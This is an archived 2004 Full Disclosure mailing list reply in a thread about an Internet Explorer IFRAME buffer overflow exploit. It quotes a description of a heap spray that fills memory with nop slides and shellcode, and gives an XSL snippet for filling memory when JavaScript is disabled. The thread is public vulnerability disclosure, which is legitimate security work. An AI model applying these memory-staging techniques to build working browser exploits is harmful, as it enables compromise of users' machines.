Full Disclosure mailing list archives
Re: MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!))
From: Georgi Guninski <guninski () guninski com>
Date: Tue, 9 Nov 2004 12:56:38 +0200
On Tue, Nov 02, 2004 at 01:41:43AM +0100, Berend-Jan Wever wrote:
The JavaScript creates a large amount of heap-blocks filled with 0x0D byte nopslides followed by the shellcode. This is to make sure [0x0D0D0D0D] == 0x0D0D0D0D. It's not the most efficient thing in the world but it works like a charm for most IE bugs.
if you need a lot of memory to be filled with something and javascript is disabled, you can use xml + xsl, which allows replacing a short string with larger one, minimizing the download. here is an example: ---xsl.xsl---------- <?xml-stylesheet type="text/xsl" href="#test"?> <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0" xmlns:d="http://msux.com/" id="test"> <d:d> <a /> <a /> <a /> </d:d> <xsl:output method="html"/> <xsl:template match="xsl:stylesheet"> <xsl:for-each select="d:d/a"> Where do you want bill to go today? </xsl:for-each> <iframe src="about:blank" /> <script>alert("javascript");</script> </xsl:template> </xsl:stylesheet> -------------------- here "<a />" is replaced by "Where do you want bill to go today?". -- georgi _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!)) Berend-Jan Wever (Nov 01)
- Re: MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!)) morning_wood (Nov 02)
- Re: MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!)) Georgi Guninski (Nov 09)
- Re: MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!)) pachiderme pachiderme (Nov 09)
- <Possible follow-ups>
- RE: MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!)) Menashe Eliezer (Nov 07)
- Re: MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!)) Berend-Jan Wever (Nov 07)
- Re: MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!)) patryn (Nov 08)
- Re: MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!)) Valdis . Kletnieks (Nov 08)
- Re: MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!)) Jim Geovedi (Nov 09)
- Re: MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!)) Berend-Jan Wever (Nov 07)